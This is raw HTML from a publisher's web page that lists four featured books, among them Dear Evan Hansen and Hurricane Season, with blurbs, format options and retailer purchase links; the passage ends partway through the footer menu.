			<img width="190" height="278" src="" class="lazyload orientation-portrait" alt="All the Things That Could Go Wrong" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2018/04/9780316416856.jpg?fit=190%2C278" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/titles/stewart-foster/all-the-things-that-could-go-wrong/9780316416856/" alt="All the Things That Could Go Wrong">
							All the Things That Could Go Wrong						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/stewart-foster/" class="title-header__author"><span>Stewart Foster</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><p><b>A moving and beautifully written story about what can happen when two completely different boys are forced to put aside their differences, for fans of <i>Wonder</i>.</b><i><b><br /></b><br /></i>There are two sides to every story.<br /><br />Alex’s OCD is so severe that it’s difficult for him to even leave his house some days. His classmate Dan is so angry that he lashes out at the easiest target he can find at school: Alex. When their moms arrange for Alex and Dan to spend time together over winter break, it seems like a recipe for certain disaster…until it isn’t. Once forced together, these two sworn enemies discover that there is much more to each other than they ever knew.</p></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Hardcover</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1255290986  desc-arrow-2364126919">
	<title id="titlet-arrow-1255290986">Arrow Icon</title>
	<desc id="desc-arrow-2364126919">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.hachettebookgroup.com/titles/stewart-foster/all-the-things-that-could-go-wrong/9780316416818/">
						ebook					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1594644382  desc-arrow-4184089185">
	<title id="titlet-arrow-1594644382">Arrow Icon</title>
	<desc id="desc-arrow-4184089185">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/0316416851?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9780316416856/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9780316416856"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9780316420211">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/titles/val-emmich/dear-evan-hansen/9780316420211/" alt="Dear Evan Hansen">
			<img width="190" height="285" src="" class="lazyload orientation-portrait" alt="Dear Evan Hansen" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2022/09/9780316420211.jpg?fit=190%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/titles/val-emmich/dear-evan-hansen/9780316420211/" alt="Dear Evan Hansen">
							Dear Evan Hansen						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/val-emmich/" class="title-header__author"><span>Val Emmich</span></a>							</h4>
													<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/steven-levenson/" class="title-header__author"><span>Steven Levenson</span></a>							</h4>
													<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/benj-pasek/" class="title-header__author"><span>Benj Pasek</span></a>							</h4>
													<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/justin-paul/" class="title-header__author"><span>Justin Paul</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><DIV><B>From the show&#039;s creators comes the groundbreaking, bestselling novel inspired by the hit Broadway show <I>Dear Evan Hansen</I> -- now in paperback!</B><BR />&#160;</DIV><I>Dear Evan Hansen, </I><BR /><BR /><I>Today&#039;s going to be an amazing day and here&#039;s why...</I><BR /><BR />When a letter that was never meant to be seen by anyone draws high school senior Evan Hansen into a family&#039;s grief<B></B>over the loss of their son, he is given the chance of a lifetime: to belong. He just has to stick to a lie he never meant to tell, that the notoriously troubled Connor Murphy was his secret best friend.<BR /><BR />Suddenly, Evan isn&#039;t invisible anymore -- even to the girl of his dreams. And Connor Murphy&#039;s parents, with their beautiful home on the other side of town, have taken him in like he was their own, desperate to know more about their enigmatic son from his closest friend.<B></B>As Evan gets pulled deeper into their swirl of anger, regret, and confusion, he knows that what he&#039;s doing can&#039;t be right, but if he&#039;s helping people, how wrong can it be?<BR /><BR />No longer tangled in his once incapacitating anxiety, this new Evan has a purpose. And a website. He&#039;s confident. He&#039;s a viral phenomenon. Every day is amazing. Until everything is in danger of unraveling and he comes face to face with his greatest obstacle: himself.<BR /><BR />A simple lie leads to complicated truths in this big-hearted coming-of-age story of grief, authenticity, and the struggle to belong in an age of instant connectivity and profound isolation.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3389912149  desc-arrow-1126544542">
	<title id="titlet-arrow-3389912149">Arrow Icon</title>
	<desc id="desc-arrow-1126544542">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.hachettebookgroup.com/titles/val-emmich/dear-evan-hansen/9780316420228/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/val-emmich/dear-evan-hansen-the-novel/9780316316590/">
						Hardcover <span class="title-header__dropdown-format">Media Tie-In</span>					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/val-emmich/dear-evan-hansen/9780316529471/">
						Hardcover <span class="title-header__dropdown-format">Large Print</span>					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/val-emmich/dear-evan-hansen/9780316420235/">
						Hardcover					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/ben-levi-ross/dear-evan-hansen-the-novel/9781549117480/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/ben-levi-ross/dear-evan-hansen-the-novel/9781549117473/">
						Audiobook CD <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2334472553  desc-arrow-2774607434">
	<title id="titlet-arrow-2334472553">Arrow Icon</title>
	<desc id="desc-arrow-2774607434">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/0316420212?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9780316420211/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9780316420211"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781643750323">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/external/title/9781643750323/" alt="Hurricane Season">
			<img alt="Hurricane Season" class="lazyload" data-src="https://ext-images.hachettebookgroup.com/9781643750323/190x285" src="" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/external/title/9781643750323/" alt="Hurricane Season">
							Hurricane Season						</a>
					</h3>

											<h4 class="title-header__byline">Nicole Melleby</h4>
									</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><p>Fig, a sixth grader, loves her dad and the home they share in a beachside town. She does not love the long months of hurricane season. Her father, a once-renowned piano player, sometimes goes looking for the music in the middle of a storm. Hurricane months bring unpredictable good and bad days. More than anything, Fig wants to see the world through her father’s eyes, so she takes an art class to experience life as an artist does. Then Fig’s dad shows up at school, confused and looking for her. Not only does the class <i>not</i> bring Fig closer to understanding him, it brings social services to their door.<br /> <br />As the walls start to fall around her, Fig is sure it’s up to her alone to solve her father’s problems and protect her family’s privacy. But with the help of her best friend, a cute girl at the library, and a surprisingly kind new neighbor, Fig learns she isn’t as alone as she once thought . . . and begins to compose her own definition of family.<br /> <br />Nicole Melleby’s <i>Hurricane Season </i>is a radiant and tender novel about taking risks and facing danger, about friendship and art, and about growing up and coming out. And more than anything else, it is a story about love—both its limits and its incredible healing power.</p></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<span class="btn btn-inverse btn-empty">
			<meta itemprop="bookFormat" content="Trade Paper"/>
			Trade Paperback		</span>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3896423831  desc-arrow-3531565780">
	<title id="titlet-arrow-3896423831">Arrow Icon</title>
	<desc id="desc-arrow-3531565780">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1643750321?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781643750323/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781643750323"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781635862065">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/external/title/9781635862065/" alt="The Gratitude Explorer Workbook">
			<img alt="The Gratitude Explorer Workbook" class="lazyload" data-src="https://ext-images.hachettebookgroup.com/9781635862065/190x285" src="" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/external/title/9781635862065/" alt="The Gratitude Explorer Workbook">
							The Gratitude Explorer Workbook						</a>
					</h3>

											<h4 class="title-header__byline">Kristi Nelson; A Network for Grateful Living</h4>
									</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><p>A Network for Grateful Living, creators of the best-selling <i>Everyday Gratitude </i>and <i>Wake Up Grateful, </i>present a distinctive workbook for readers who want to start a gratitude practice or integrate gratitude into their lives with greater intention and consistency.</p>
<p>This interactive package acts as both a guide and a journal for recording thoughts and meditations. Dozens of writing prompts, guided meditations, and exercises for beginning and progressively deepening a daily gratitude practice are paired with quotations and space for writing and personalizing the book.</p>
<p>The beautifully designed gift package includes bonus features in the back: 10 quotation postcards, mini-cards for keeping in a wallet or leaving for others, conversation starters, gold star stickers, and reusable affirmation stickers, as well as die-cut bookmarks for each section of the book.</p></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<span class="btn btn-inverse btn-empty">
			<meta itemprop="bookFormat" content="Trade Paper"/>
			Trade Paperback		</span>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3769561828  desc-arrow-3272786562">
	<title id="titlet-arrow-3769561828">Arrow Icon</title>
	<desc id="desc-arrow-3272786562">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/163586206X?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781635862065/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781635862065"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>
				</div>
		</div>

			<!-- Add sidebar if sidebar content -->
				</article>
</main>

<div class="hbg-after-main-content">
	</div>
				
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-810918057  desc-hachette-logo-ini-1654220812">
<title id="title-hachette-logo-ini-810918057">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-1654220812">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
			<ul class="site-footer__social">
							<li class="site-footer__social-list-item">
					<a href="https://www.facebook.com/HachetteUS/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-2418681740  desc-facebook-icon-3928264978">
	<title id="title-facebook-icon-2418681740">Facebook Icon</title>
	<desc id="desc-facebook-icon-3928264978">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://twitter.com/HachetteUS" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-622095858  desc-twitter-icon-1430568044">
	<title id="title-twitter-icon-622095858">Twitter Icon</title>
	<desc id="desc-twitter-icon-1430568044">Twitter Logo</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://www.instagram.com/hachetteus/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-3178182610  desc-ig-icon-2156678686">
	<title id="title-ig-icon-3178182610">Instagram Icon</title>
	<desc id="desc-ig-icon-2156678686">Instagram Icon</desc>
	<rect role="presentation" class="cls-1" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" class="cls-1" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
																			<li class="site-footer__social-list-item">
					<a href="https://www.hachettebookgroup.com/newsletters/"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Email"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-email-icon-1112559508  desc-email-icon-405652115">
	<title id="title-email-icon-1112559508">Email Icon</title>
	<desc id="desc-email-icon-405652115">Envelope</desc>
	<path role="presentation" class="cls-1" d="M8.38,12.53a.64.64,0,0,0,0,.09V26.1l6.29-7.48Z" transform="translate(0 0)"/>
	<polygon role="presentation" class="cls-1" points="29.58 11.97 9.17 11.97 19.37 19.94 29.58 11.97"/>
	<polygon role="presentation" class="cls-1" points="19.37 23.18 16.46 20.36 9.07 26.83 29.68 26.83 22.29 20.36 19.37 23.18"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0ZM31.83,26.72a1.57,1.57,0,0,1-.36,1,.55.55,0,0,1-.21.21,1.44,1.44,0,0,1-1,.36H8.45a1.5,1.5,0,0,1-1-.37.58.58,0,0,1-.2-.21,1.5,1.5,0,0,1-.35-1V12a1.59,1.59,0,0,1,.36-1,.74.74,0,0,1,.29-.27,1.39,1.39,0,0,1,.89-.31H30.29a1.5,1.5,0,0,1,.7.18l0-.05.66.63-.06,0a1.58,1.58,0,0,1,.21.78Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M24.08,18.62l6.29,7.48V12.62a.64.64,0,0,0,0-.09Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
					</ul>
		<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
